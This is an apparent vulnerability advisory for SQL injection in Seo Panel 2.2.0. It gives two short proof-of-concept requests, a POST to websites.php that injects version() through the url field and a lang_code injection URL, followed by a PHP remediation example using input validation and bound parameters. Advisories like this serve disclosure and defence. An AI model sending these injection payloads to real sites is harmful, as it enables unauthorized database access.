Seo Panel 2.2.0 SQL injection vulnerabilities

2011-02-16T00:00:00
ID MYHACK58:62201129183
Type myhack58
Reporter Anonymous
Modified 2011-02-16T00:00:00

Description

Seo Panel is a site management and SEO system. In Seo Panel 2.2.0, websites.php and index.php contain SQL injection vulnerabilities that could lead to disclosure of sensitive information.

[+]info:
~~~~~~~~~
Seo Panel 2.2.0 SQL Injection Vulnerabilities
Product: Seo Panel
Vendor: http://www.seopanel.in/
Vulnerable Version: 2.2.0
Vendor Notification: 01 February 2011
Vulnerability Type: SQL Injection
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

[+]poc:
~~~~~~~~~
The following PoC is available:

POST /websites.php HTTP/1.1

sec=create&name=123&url=http%3A%2F%2F123'%2Cversion()%2C1%2C1%2C2%2C1)%20--%20&title=1&description=1&keywords=1

http://[host]/index.php?&lang_code=1%27SQL_CODE_HERE

[+]Reference:
~~~~~~~~~
http://www.htbridge.ch/advisory/sql_injection_in_seo_panel_1.html
http://www.htbridge.ch/advisory/sql_injection_in_seo_panel.html
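
The two inputs named above (the url field posted to websites.php and lang_code in index.php), handled with allowlist validation and bound parameters. This is an added example, not Seo Panel's code or the vendor's fix; the websites table and its columns, the function names, the language-code pattern, and the use of PDO with an in-memory SQLite database (pdo_sqlite extension) are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical schema and function names for illustration; not Seo Panel's own code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE websites (id INTEGER PRIMARY KEY, name TEXT, url TEXT,
            title TEXT, description TEXT, keywords TEXT)');

// index.php lang_code: accept only a language-code shape, otherwise use the default.
function safeLangCode(?string $raw, string $default = 'en'): string
{
    $ok = $raw !== null && preg_match('/\A[a-z]{2}(?:_[A-Z]{2})?\z/', $raw) === 1;
    return $ok ? $raw : $default;
}

// websites.php sec=create: validate the URL, then bind every field as a parameter
// so a quote in any value cannot close the VALUES list.
function createWebsite(PDO $pdo, array $post): int
{
    $url = (string)($post['url'] ?? '');
    if (preg_match('#\Ahttps?://#i', $url) !== 1
        || filter_var($url, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('invalid url');
    }
    $stmt = $pdo->prepare(
        'INSERT INTO websites (name, url, title, description, keywords)
         VALUES (:name, :url, :title, :description, :keywords)'
    );
    foreach (['name', 'url', 'title', 'description', 'keywords'] as $f) {
        $stmt->bindValue(':' . $f, (string)($post[$f] ?? ''), PDO::PARAM_STR);
    }
    $stmt->execute();
    return (int)$pdo->lastInsertId();
}

// Constructed inputs: the advisory's url value (URL-decoded) and a benign name with a quote.
$poc = ['name' => '123', 'url' => "http://123',version(),1,1,2,1) -- ", 'title' => '1'];
try {
    createWebsite($pdo, $poc);
} catch (InvalidArgumentException $e) {
    echo 'PoC url rejected: ', $e->getMessage(), PHP_EOL;
}
createWebsite($pdo, ['name' => "O'Brien", 'url' => 'http://example.com/']);
echo 'stored name: ', $pdo->query('SELECT name FROM websites')->fetchColumn(), PHP_EOL;
echo 'lang_code used: ', safeLangCode("1'SQL_CODE_HERE"), PHP_EOL;
```

The bound parameters are what close the injection; the URL and language-code checks are defence in depth and keep malformed records out of the table.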